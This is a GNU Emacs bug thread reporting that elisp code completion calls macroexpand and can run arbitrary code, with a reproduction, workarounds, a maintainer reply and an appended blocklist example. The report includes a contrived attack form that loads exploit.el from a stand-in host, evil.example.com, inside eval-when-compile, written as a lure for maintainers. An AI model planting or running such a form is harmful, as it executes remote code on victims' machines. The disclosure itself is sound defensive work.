From: Stefan Monnier <monnier@HIDDEN>
To: Wilfred Hughes <me@HIDDEN>
Cc: 32495 <at> debbugs.gnu.org
Subject: Re: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Date: Thu, 23 Aug 2018 14:54:31 -0400
Message-ID: <jwvefeoudlu.fsf-monnier+emacs@HIDDEN>
In-Reply-To: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN> (Wilfred Hughes's message of "Wed, 22 Aug 2018 01:11:55 +0100")

> 1. pass in an environment with all untrusted macros replaced with dummies:

Sounds like a good first step.  We could even start with a blacklist
rather than a whitelist (eval-when-compile, eval-and-compile,
cl-eval-when, ...), so the point would be to protect oneself from
accidental problems rather than from malign adversaries.

> 2. bind all eval-capable functions first (INCOMPLETE, there are other
> eval-capable functions, such as load):

Trying to plug each and every hole sounds like a losing game (e.g. you
can implement `eval` by building a `(lambda () ,exp) and then causing it
to be called one way or another).

Ideally, we'd have some way to confine Elisp code to a sandbox of some
sort (e.g. no access to any I/O and all changes to global vars are
ignored).

        Stefan
From: Wilfred Hughes <me@HIDDEN>
To: bug-gnu-emacs@HIDDEN
Subject: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Date: Wed, 22 Aug 2018 01:11:55 +0100
Message-ID: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@HIDDEN>

elisp-completion-at-point calls macroexpand, which may execute arbitrary
code.

REPRODUCING

1. Insert this code in a buffer in emacs-lisp-mode.

   (let ((foo (eval-when-compile (debug)))) x)

2. Put point on x.

3. Press C-M-i, or M-x elisp-completion-at-point.

4. Observe that the debugger is opened, because code is being executed!

SEVERITY

I don't know whether Emacs considers calling code-completion on untrusted
code to be a concern or not. A contrived example might look like a bug
report containing the following:

   (let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
         ;; ... lots of code
         (bar 1))
     ;; Dear maintainer, I've found a bug in your completion. Please try
     ;; completion in the following:
     abc
     )

This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks.

However, this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.

WORKAROUNDS

When calling macroexpand or macroexpand-all, either:

1. pass in an environment with all untrusted macros replaced with dummies:

   (let ((macro-whitelist '(when pcase))
         all-macros safe-env)
     ;; Collect every macro currently defined.
     (mapatoms (lambda (sym)
                 (when (macrop sym)
                   (push sym all-macros))))
     ;; Map each non-whitelisted macro to `ignore', so it expands to nil.
     (mapc (lambda (sym)
             (unless (memq sym macro-whitelist)
               (push (cons sym (symbol-function 'ignore)) safe-env)))
           all-macros)
     (macroexpand-all arbitrary-form-here safe-env))

2. bind all eval-capable functions first (INCOMPLETE, there are other
   eval-capable functions, such as load):

   (require 'cl-lib)                ; for `cl-letf'
   (cl-letf (((symbol-function 'eval) #'ignore)
             ((symbol-function 'eval-region) #'ignore)
             ((symbol-function 'eval-buffer) #'ignore)
             ((symbol-function 'backtrace-eval) #'ignore))
     (macroexpand-all some-arbitrary-form-here))
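As an added example (not code from the report or from Emacs itself), here is the blocklist variant of workaround 1 that Stefan's reply suggests, combined with a purely syntactic pre-scan that reports blocklisted macro heads before any expansion happens; as Stefan notes, this guards against accidental side effects rather than a determined adversary. All `my-` names are assumptions introduced for the example.

```elisp
;;; Added example: blocklist-based macro environment plus a syntactic
;;; pre-scan.  The `my-' names are assumptions, not Emacs or report code.
(require 'cl-lib)

(defvar my-eval-time-macros '(eval-when-compile eval-and-compile cl-eval-when)
  "Macros whose body runs at macro-expansion time (the blocklist).")

(defun my-safe-macro-env (&optional extra)
  "Return a macro environment neutralising `my-eval-time-macros' and EXTRA.
Each entry maps the macro to `ignore', which accepts any arguments and
returns nil, so the macro expands to nil and its body is never run."
  (mapcar (lambda (m) (cons m #'ignore))
          (append my-eval-time-macros extra)))

(defun my-safe-macroexpand-all (form &optional extra)
  "Like `macroexpand-all' on FORM, with blocklisted macros neutralised.
The environment applies to nested expansions too, so a user macro that
expands into `eval-when-compile' is neutralised as well."
  (macroexpand-all form (my-safe-macro-env extra)))

(defun my-form-eval-time-macros (form)
  "Return the blocklisted macro heads that occur literally in FORM.
This is a syntactic scan only: nothing is expanded or evaluated, so it
cannot see blocklisted macros produced by expanding other macros."
  (let (found)
    (cl-labels ((walk (x)
                  (when (consp x)
                    (when (memq (car x) my-eval-time-macros)
                      (cl-pushnew (car x) found))
                    ;; Descend into every element; stop at a dotted tail.
                    (while (consp x)
                      (walk (pop x))))))
      (walk form))
    (nreverse found)))

;; Constructed input: the reproduction form from the report.
(let ((form '(let ((foo (eval-when-compile (debug)))) x)))
  (list (my-form-eval-time-macros form)
        (my-safe-macroexpand-all form)))
```

With the reproduction form, the pre-scan reports eval-when-compile and the expansion proceeds with that binding replaced by nil, so no debugger opens.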